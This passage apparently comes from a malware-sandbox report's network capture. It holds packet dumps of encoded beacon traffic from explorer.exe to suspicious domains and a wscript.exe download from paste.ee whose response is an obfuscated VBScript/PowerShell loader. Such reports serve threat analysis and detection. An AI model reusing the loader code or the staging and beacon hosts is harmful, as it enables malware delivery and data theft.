7a 61 35 43 5a 4f 5a 73 7a 4a 58 2d 4f 37 74 46 53 6f 70 4a 6e 49 71 58 32 43 77 45 7a 58 50 73 41 55 31 31 5a 54 6d 73 56 4a 39 67 56 5a 31 47 31 51 69 79 76 39 65 7a 72 7a 76 45 7e 2d 50 54 53 2d 74 66 38 5a 7a 67 49 68 50 7a 66 42 42 73 38 54 66 37 72 71 77 68 78 30 56 6d 51 48 53 77 4a 39 65 6e 4a 55 4e 6a 74 42 4a 5f 4a 31 32 45 6f 73 56 67 58 4a 62 76 56 66 66 69 53 49 54 75 78 74 28 64 28 68 4e 7a 48 6a 39 51 59 72 38 42 34 33 44 68 53 4a 39 73 54 49 4e 62 4c 70 31 53 31 33 43 39 30 35 4b 34 30 49 48 68 28 58 56 69 65 67 51 31 47 36 51 64 53 65 4d 47 79 67 54 31 6f 74 55 5a 34 30 66 4a 6c 50 6a 76 7a 38 43 72 50 56 42 31 58 53 62 72 39 45 71 31 5a 54 62 6f 6c 65 34 5a 6a 69 70 52 76 4d 31 37 69 75 4e 58 70 67 47 64 64 5a 70 4c 30 39 49 4c 50 5a 69 48 4e 77 53 37 4a 58 69 63 6f 31 5a 64 6e 31 76 67 49 59 6e 4e 76 45 4f 6b 41 46 59 49 5a 50 31 56 79 45 70 6e 4f 70 47 6b 4b 7a 75 6b 36 7a 4b 66 41 42 34 54 46 56 35 6b 33 36 49 65 38 46 5a 38 62 77 4c 67 4d 75 33 6b 78 33 41 51 75 5f 52 34 45 6d 4b 6e 7e 68 4f 66 61 73 48 59 54 52 53 44 46 67 37 4f 6c 4a 76 72 6b 4e 43 4d 4a 59 42 58 59 47 48 44 66 42 48 61 4a 6e 50 53 46 51 44 48 67 74 50 62 48 58 51 41 50 78 6e 79 63 63 67 6f 54 55 73 73
                                                                                                                                                                                                                                                                Data Ascii: r0=x3IcKmfjMUc2dHxtcFbA0uutHJwrLBXPpdKKRaoJXxXNAgy7bnF_lhg4Pn4lUo1WPx2GcD7fe_tHjisM4GwfrBDSDJZLkeg72Dc1eqlGJpjEW1nPZdcs45IdvPT0YqRhyiC1oV2-avhyem0_(NvhAPR9nDCihZ(nQJLjkwkxlDm4FqtnqIiuwDAlj3DQfRxzc2UDckwYJ1CQaxu6VJrAyLpOJ_jEiKJO1xMTqSJiQJRiIheDpEV22tuvnSpXd73ZSti1G8SPA5qqQmShpyvsnTC8YviwOly7CyMN5Rkzbpm4Kw3igKucqMSHXGH4VhkthrMaDvNGZWtM2aWeTBxGlafh6Vdk8MwdV5vQbiD1icLrp9YAIGegssFm~_lFojj858kwnTKG2RI9epkBa3SCwUqF8uZjtYwp~FzL3Wssu5dH3zO3tnhRF0gzGwRyUvUBt_t0nbGgoTom(mKX0IRCX-gZ9T4eOniOY5tcpnTJxT8Ah5kDTshgzMbKRJR-OSjnJWdk3R2FXpRgKssrTWZEPcL1(B3X5AmOEnewAYE3fNnW3yMCdpnrWg9aYvf4J3K5Y42jUaHPXe3OYTb6eP7PSwIaiE9i4YeeMrw2mZHr2Z6XIMTgn-XUFs(F76MUSK0iFwBL6fGI4QF_vdoSITPtry26Ex5a00o-xSOF6oZdnwlk(SeNjplmN5(VgQV9wJJtxVvcQ0bJi2kyLcq9ewQZNr26rwL71qnTVH~9(WU_OifbTUsx5KvB~0615HMhaeg65PI8zEQn9Z~cwcArLVK_R0L6Tr4OMYnucWSTh1VP9nr2Zc0NAMI70OhUPfYKbi~_omlxpWLID27Tbbc8MJfuk8BtnNs38KtSAwundT6qv_IuJRPiOhnGsWVl3uZbk7Kn4PNtFOZfCY90M56M172uNV(NNA8Qj03su6xjjT3zTPivye~MBLNAimuPKULLza5CZOZszJX-O7tFSopJnIqX2CwEzXPsAU11ZTmsVJ9gVZ1G1Qiyv9ezrzvE~-PTS-tf8ZzgIhPzfBBs8Tf7rqwhx0VmQHSwJ9enJUNjtBJ_J12EosVgXJbvVffiSITuxt(d(hNzHj9QYr8B43DhSJ9sTINbLp1S13C905K40IHh(XViegQ1G6QdSeMGygT1otUZ40fJlPjvz8CrPVB1XSbr9Eq1ZTbole4ZjipRvM17iuNXpgGddZpL09ILPZiHNwS7JXico1Zdn1vgIYnNvEOkAFYIZP1VyEpnOpGkKzuk6zKfAB4TFV5k36Ie8FZ8bwLgMu3kx3AQu_R4EmKn~hOfasHYTRSDFg7OlJvrkNCMJYBXYGHDfBHaJnPSFQDHgtPbHXQAPxnyccgoTUssB7T5qafT3OPgIMH4zV2atJrvISKRmvGZM-FrdpL4rdm5Q7nHPh4EAAEELECbGPSIgFbk4xitrJwh3e9evai36jgxTTVO~QfC2z6pAfeqvMyZ(PGbThp6xnJ-4WjTHdci4UCgwh12EEqPKikd5AFmvVodaqAP8gn5eTsXVTscXHPTB7PrKRJ-wZH0l5VzGk0pYubry_D0T9q-oOXY5ukNSOHx9V7j4etVvpl5QFYcTigDIgb2G_iy4vtq~SMsMQgyDJz5A5AFIGyn3XlIFI9iiMPTo5R2bWnlCGTUt83L2YA5(HnU47j0XeAcmbQAEPi4Kb0RsqsPlmdFxj(7aFiT9CvuVsHuWSJEejTK7sO4e4QTU5uaqTZzY83VaVj7t5Oh8jT4g2t8zG~u4zAbU-D2qBYHjbV_DU98rJSikj0qMGslLtHpmuox4ddkQVrdKs6yF-4nSk3_wdm3XZL-sXbTVWCPH_DlsgjKVDlkP-w3mEAsBzqEE4lebNNaHNND7c0ppQ0XesozoZvEeS59a4CEmi9sNAA6ELVFABzBXHgG2cLsxMfj3CPsx93tNKluiG8Iv7uxPet9ZslVMJSsBxPF5xCZXFbHI54ni7ngoorvG3ie6qwcKZR9ECaxrv8TH6yKjpBIZ1yIvYA-pzbe1dV7mgEu8Lz-uI3eA65_6MnzA44vNzRkVLMRbkighvpN8cofHb7r9zjYV9R8yyIKYvxgbv(qJzitCIV47azoAOVG0aCppBsUhm2RQ2fGXniz71As4_k_Gvqlgib1YYHewIqXWmMPKhg9b3HaZtfXT_3oR145moYlF7VA8Y7IYiEX(VEvLDPG2_CFs2(rqdE6x0nlOc40OFHVYolUYdpfUQMISmIBiCo3Yms44-PEHXLrcVQSJHzREAY0Y_5KdbQiK8rynb6uR1Puw9xEsbncTW0dQhuV(r(hyZaxfKy8P2fPs79krGMBllbUA8HOkFWMO-iMO4Ku66nH6DVmR0xPscT9j4i4UFMopTeQtAipXwXCVaiHlgip4-zaU0evFp6M7KljOc98UxTXxC5OUrwh7UPADS974f1ClIQ04p1aIw5gkJAlIORDRF7To07uAEUdNjgqOuQ_OgvKnQLM(BoQ(DzMOJE29jYUHL9ruVktRoDkNZnMuooT5Nc9NDDjTPAIv-31BkzaIMYQeBcYRTqN~RrYkrUbpCn8(vYb6aGTwEVsaGWQiROITCV6NbNiOZBAvWtzXWcF2eG1uCnjP0rUu3MpJm89MB3z5mmXEFbA2fTaSZ3GmALTE_P_C16q89CGVr89XtfOlcnFn1V5F_w44fme(wm3xalpf2ZoAZT1ytYe9p(5q4iWTVvYoe5T3kjuDCr8ehDyylRSwbxO~H85hPSxmvbEhIhc(NQU6F43qL7zoOrbkGBrU9We1-5wJnQ0WKWsQn8vINMw7VIXwfwQgujWlnlU9N1M1poBSB5KbITjBGcio9EybVZkW99c7AxGIZZMxM5xktPakWCbFLYrAopaqsw6Gq~n(qsgo6rriEzCqPnWGIHS7r3R9MDS5AR0H_9i2tGQJjGpP1gIc8M5bnddTl5gvs5xa9O0yoW2ug5KiZs9qWZR7GQEdGYt~LnWLvVryxIfNOQObtKjN_EhcDTJ4adByPwcqZoFXTsvlxeMv7Oz5mfik2GtWsqxrjBeeuBPZ6ZJmQshXmDAryIdOGscmkEJQgrvjKznlBEJQ33BMTBRADfIGBoZ3irOGSFSi-q5io4s(x1cgkJ5mM2cyse-1A8EroEqN6y_AvG4RCK_Cpq0buElyUQc(twLIeeHNb8Ms0lZjewBFpNwRbI59Xsm1Omnv3r_GSGW~p6LdgabyCQx8jm-1QV4v3Z7NHzby4e4HuOVhIewxMo05xb0RIdHBbz_9JUHofQatF423NV4MeIzwXILitzg9LzegVIoJkPPwr~7cVhw4MIQK10ZSHVLEBbpSf38MpMiul9jtoksFEXxSymxfjHlrAf6SjofeEdctpWTyI3YSCvGh-nSa3UkMLa66UW9lmYOS1uN9xLvvkluK77_ddJCGdASIDD73DGIzwKETA9FP2dfu6tkaB6wAxO5bNHumaRDEoloF6xx9E6_5hlN4PM_5YrhHMSgy6RkbtYyZHuSnt4OCA2xx9oOQdd6Tnsn1efEwJQG6KM84qrPdU9bHW5dTz1Ilz~bfGZsWgmPaL(JE1eQE7iV7Rg7peF6S188jQpevhTFifho(Qb8ygDhL_cMeLH39XWj~HQVfh(kpb1SFRatOjkJet5hiRVuuBp4~0j8ChqbHXgxOV21nk7X8FLibCI4FEcXslJbA5fngaKXUsF9Z6n9ngE_LPLZeGRWDoBPOYn1FZqAg-fad1Yf769qkYgcG2a_Xck96wjso5xaolk-wtoriZYtzbq3TVXSviWYmFCM1QajJIyxImaSWhq4fBL46sleS_tsnVF8lg~VmYtfO3hLHX5i1WPjm_kgxrsH8S(XLibXbG4g73B4peAM73gs~Ans5CH4K70PAsedcMTRP09-0tmSMWohRu9DU20vdEWDSSYWFIHL7k7vX1bzqB1ca8M6yrLPUYxq9X3RzqbNnoOMKNEXn9IAmSmAljf_M7hKHGZ8XSOaqB7xwTTkiuJ8DsoqjmrQrGc_BGhCENFDHXSoWHQyfl9-PFW5jR1S06MqIemqLnTJKXU6zriap7gu8c6tgct6cBmMie1_ZkXB1VW
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.470015049 CEST24491OUTData Raw: 52 36 73 61 44 4b 64 47 61 54 46 71 33 44 51 6d 6b 56 31 44 6f 72 6e 48 4e 55 63 39 6b 46 45 50 7e 44 67 54 6f 41 75 6d 71 53 36 66 49 7a 79 6e 42 49 32 55 34 31 39 34 42 4d 61 51 49 4d 51 67 31 72 36 45 5a 50 4e 6b 79 56 6c 77 52 74 31 65 63 46
                                                                                                                                                                                                                                                                Data Ascii: R6saDKdGaTFq3DQmkV1DornHNUc9kFEP~DgToAumqS6fIzynBI2U4194BMaQIMQg1r6EZPNkyVlwRt1ecFBSNArpluQpAHBhzsJr2oyXcCvNCCRfmfUzF0KeqHk3nj9GlWKhvAkOU6pwLJxwaDFU6omZD7mCXbGeAMql2ELGST46PBXdMIT2KjAEOdpaVRLcaEd8cPrhYGgEa-YnOnkscH9MAwpPP6n62V3V9pi0UjlOUAoSiDW
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.625297070 CEST45115OUTData Raw: 6f 77 4c 56 38 37 69 5a 70 54 72 28 52 52 4c 49 4f 71 71 64 74 42 66 49 42 51 68 76 4b 77 58 41 61 63 34 79 42 6b 59 73 6c 77 72 51 69 59 62 46 4b 77 36 45 36 76 76 78 67 65 4e 32 43 30 6f 32 6d 76 54 6b 63 6b 37 78 31 6f 38 77 6e 32 42 34 41 32
                                                                                                                                                                                                                                                                Data Ascii: owLV87iZpTr(RRLIOqqdtBfIBQhvKwXAac4yBkYslwrQiYbFKw6E6vvxgeN2C0o2mvTkck7x1o8wn2B4A2mEPkfNU8nTISG5HGtRi9zzK(itRZ3q31FBbeaiR0FvKpUKL~ojn1o8953US2pqU1_0Bsgs5MMeZT0(XSuFPF89sj_89r0vfTNuC7u8EQJH4rrggcvg1NzzHrM1cgxPqciH2qxu1CK(DKithqJ6oWBRg~ss_DRdyLP
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.780426979 CEST43826OUTData Raw: 52 77 70 34 51 78 37 43 28 70 76 30 50 50 6a 32 39 6d 65 38 77 51 38 74 7e 72 46 32 64 56 41 5a 66 45 65 72 44 4b 67 71 46 49 6d 36 51 79 28 39 59 36 79 62 6b 6e 6c 46 7e 43 6f 75 56 39 4a 75 34 54 5a 31 66 45 4a 67 4b 4f 4d 71 42 66 41 7a 48 55
                                                                                                                                                                                                                                                                Data Ascii: Rwp4Qx7C(pv0PPj29me8wQ8t~rF2dVAZfEerDKgqFIm6Qy(9Y6ybknlF~CouV9Ju4TZ1fEJgKOMqBfAzHUr_zxSC6NekaeKt5Xp56rZ0gRZcu7Egmvm_WoAfttdQvAJ4QDwQ6485Hjjg7bDvSJH1ewDzJw0_RDdnq77u25le2mARmzHWh8ald0PtTx9vcpFTi2QKGHLXH4hM3I5Yf9hlLfoHeOTlg-mIyKWoEHU1w-hMEoYR4wO
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.781061888 CEST11601OUTData Raw: 39 55 68 61 54 4c 66 6e 4c 6d 30 4a 6c 66 6b 33 6d 5f 75 34 6b 57 53 6c 31 78 71 35 32 57 73 4d 69 52 50 75 71 66 6d 74 52 46 75 5a 57 57 68 58 36 54 35 2d 56 41 64 38 6d 6d 68 33 45 41 67 74 50 58 71 61 4c 6d 59 6a 4e 4f 34 46 49 52 4b 41 6d 66
                                                                                                                                                                                                                                                                Data Ascii: 9UhaTLfnLm0Jlfk3m_u4kWSl1xq52WsMiRPuqfmtRFuZWWhX6T5-VAd8mmh3EAgtPXqaLmYjNO4FIRKAmfu8IY47t_ikne1B2DSdargXOhjdeWPEEwvziQW4etYHr7eQ9-AmZTstooOjAq~8SvtW1EvC1iw6dwzDXstFykU0zI7ADNeYQf5L6zsv(m6UyVu45syUe52Mfwc1~aECrG~mHOsrSJoigZFGyc(YocR4iuAyD2MnaFW
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.781424046 CEST5156OUTData Raw: 75 36 43 6f 42 76 71 7e 5f 51 56 55 6f 5a 5f 49 75 7a 76 69 49 55 6d 68 6b 54 79 74 7a 4e 48 43 72 68 37 45 58 6c 50 61 38 43 32 35 48 57 30 64 39 4f 4d 55 74 70 61 6e 50 38 4e 6d 71 72 78 61 38 7e 4d 7e 6a 64 38 34 42 39 31 70 73 6b 55 68 44 76
                                                                                                                                                                                                                                                                Data Ascii: u6CoBvq~_QVUoZ_IuzviIUmhkTytzNHCrh7EXlPa8C25HW0d9OMUtpanP8Nmqrxa8~M~jd84B91pskUhDvJZPwCLnEDwt0plfk-I3Ml(kQRmqC4TUPTfld7hOmLeR9Uoz~_FsDNbysJi3K4nQ1v6DsIqqxED3mw0t52S3eUWdiwEr8HyTWJYl3tGEz050seUtpcII22b6B3BxX-DYLHUi8ATqmqSzJJdER-kXUAA0VyTBzhL_AV
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.781632900 CEST10312OUTData Raw: 6a 6b 4c 6c 37 72 47 41 33 74 41 48 48 48 63 4d 77 64 4e 36 53 7e 46 65 7a 61 57 4e 41 7a 4a 58 62 35 35 76 4f 6e 76 35 77 6c 64 68 65 73 42 4a 4c 30 48 28 67 62 4d 50 67 78 4f 64 63 5a 37 76 74 51 6a 63 51 47 58 67 55 69 45 39 38 4a 47 69 32 58
                                                                                                                                                                                                                                                                Data Ascii: jkLl7rGA3tAHHHcMwdN6S~FezaWNAzJXb55vOnv5wldhesBJL0H(gbMPgxOdcZ7vtQjcQGXgUiE98JGi2Xx~QWd5vgF6iL_QKbuBUTJuZFfr-rXX_(DV0XgNg3iSfLJ29UvYlFrulOT7JLdb-8Knydf5TWMPhPuavBR54HQhTH54wsx79V7(L0ilYOr(X6vAe8AhFzb8ZVdGa5wxg~Ny8nPA9lW8QArQBImzSn_0q8DbKG32-9v
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.785870075 CEST7734OUTData Raw: 4b 51 34 65 53 54 32 61 70 68 34 39 62 35 4c 49 49 58 38 50 35 77 4a 38 36 61 58 48 6f 76 38 7e 5a 6a 6f 4c 59 52 50 4e 68 6b 2d 28 6e 57 2d 76 53 7a 33 51 79 70 5a 47 5f 51 45 4b 52 49 46 43 61 28 6f 4c 72 77 38 28 35 46 61 68 46 38 54 45 56 30
                                                                                                                                                                                                                                                                Data Ascii: KQ4eST2aph49b5LIIX8P5wJ86aXHov8~ZjoLYRPNhk-(nW-vSz3QypZG_QEKRIFCa(oLrw8(5FahF8TEV0KFz0QDtj1kfkjP-DQTrbZECyO6pvb348pr8BFVlaRjnEcDt54T2s9SrrjQoztuYCgwqCCRJKQelo1xrhjpxkNVIMnPEqICzokXDdrqFzm(HscOtt1V5F3t48Ju78AoFe82X5d9cLR~2XQCCxdxs4DN8CUSrrgikhT
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.936078072 CEST14771OUTData Raw: 56 64 56 31 39 61 35 33 6d 7a 4c 37 74 51 71 4c 6f 39 46 68 43 51 43 6a 74 58 45 41 6b 49 42 51 4c 66 5f 65 37 77 73 78 31 72 6d 53 6a 49 5a 6f 42 69 39 69 72 6e 6c 6d 78 59 72 61 53 44 71 70 44 44 4e 7a 73 31 54 66 6c 7a 36 66 71 67 4b 32 69 7a
                                                                                                                                                                                                                                                                Data Ascii: VdV19a53mzL7tQqLo9FhCQCjtXEAkIBQLf_e7wsx1rmSjIZoBi9irnlmxYraSDqpDDNzs1Tflz6fqgK2izcYKe1qP6Qh_3P1OSTyP(2JFOVhjXwqLlLcsUITgN4g4b2PaRkjXoWFkQ-Apd8o2R_8_8QYkBodGnr0OIUDceFjETRNySV9s3g6_i9An(e9qsNZDvYX_0n~j9PArB66PeG~UXkMUXQdnzrR5xMVo6hMFp9WdHeARZO
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:53.232353926 CEST456INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                Date: Thu, 18 Apr 2024 19:12:52 GMT
                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                Content-Length: 276
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 78 61 73 76 63 64 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.xasvcd.xyz Port 80</address></body></html>


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                3192.168.2.4497443.33.130.190802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.377088070 CEST156OUTGET /m07a/?r0=kbHmn/9MInRG3rqwWMOzjv0FEYEHMcqozMEbxoNxlifqHhdD1tGr+ls2dZBuYaiV3Vua&CN6=8pHxU0H HTTP/1.1
                                                                                                                                                                                                                                                                Host: www.lunazone.us
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                0192.168.2.449730172.67.187.2004436940C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-04-18 19:11:14 UTC319OUTGET /d/K2No9 HTTP/1.1
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Accept-Language: en-ch
                                                                                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                                                Host: paste.ee
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                2024-04-18 19:11:15 UTC1234INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Thu, 18 Apr 2024 19:11:15 GMT
                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Cache-Control: max-age=2592000
                                                                                                                                                                                                                                                                strict-transport-security: max-age=63072000
                                                                                                                                                                                                                                                                x-frame-options: DENY
                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K8PDtvxtJGUqY%2BcfvQvZ2dJOi6iYsyJxgZF6uzuTOhSY%2FDXMTbEXkNnLTW8eeCpeHK4ZKslYeSvxlPX1BTznDkTMt3vcZM561OTcYotXLV%2FiuJqjyg77eChcfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8766f5a51912b033-ATL
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-04-18 19:11:15 UTC135INData Raw: 33 35 63 39 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 6f 76 61 72 69 73 74 61 20 2c 20 63 61 6c 65 63 65 69 72 6f 20 2c 20 74 61 6e 67 65 6e 64 6f 20 2c 20 6c 61 64 72 69 6c 68 6f 20 2c 20 74 72 61 70 61 6c 68 6f 6e 61 20 2c 20 43 61 6d 61 20 2c 20 74 72 61 70 61 6c 68 6f 6e 61 31 0d 0a 20 20 20 20 20 63 61 6c 65 63 65 69 72 6f 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 74 61 6e 67 65 6e 64 6f 20 20 3d 20
                                                                                                                                                                                                                                                                Data Ascii: 35c9 dim ovarista , caleceiro , tangendo , ladrilho , trapalhona , Cama , trapalhona1 caleceiro = " " tangendo =
                                                                                                                                                                                                                                                                2024-04-18 19:11:15 UTC1369INData Raw: 22 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 42 74
                                                                                                                                                                                                                                                                Data Ascii: "" & ladrilho & caleceiro & ladrilho & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBt
                                                                                                                                                                                                                                                                2024-04-18 19:11:15 UTC1369INData Raw: 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c
                                                                                                                                                                                                                                                                Data Ascii: bgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & ladrilho & caleceiro & ladrilho & "gBvDgTreHIDgTre" & ladrilho & caleceiro & ladril
                                                                                                                                                                                                                                                                2024-04-18 19:11:15 UTC1369INData Raw: 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 75 44 67 54 72 65 47 49 44 67 54 72 65 63 67 44 67
                                                                                                                                                                                                                                                                Data Ascii: wBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & ladrilho & caleceiro & ladrilho & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & ladrilho & caleceiro & ladrilho & "QBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDg
                                                                                                                                                                                                                                                                2024-04-18 19:11:15 UTC1369INData Raw: 45 44 67 54 72 65 4e 77 44 67 54 72 65 78 44 67 54 72 65 44 4d 44 67 54 72 65 4d 77 44 67 54 72 65 35 44 67 54 72 65 44 51 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 79 44 67 54 72 65 44 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 63 61 6c 65 63 65 69 72 6f 20 26 20 6c 61 64 72 69 6c 68 6f 20 26 20 22 51 42 43 44 67 54 72 65 48 6b 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72
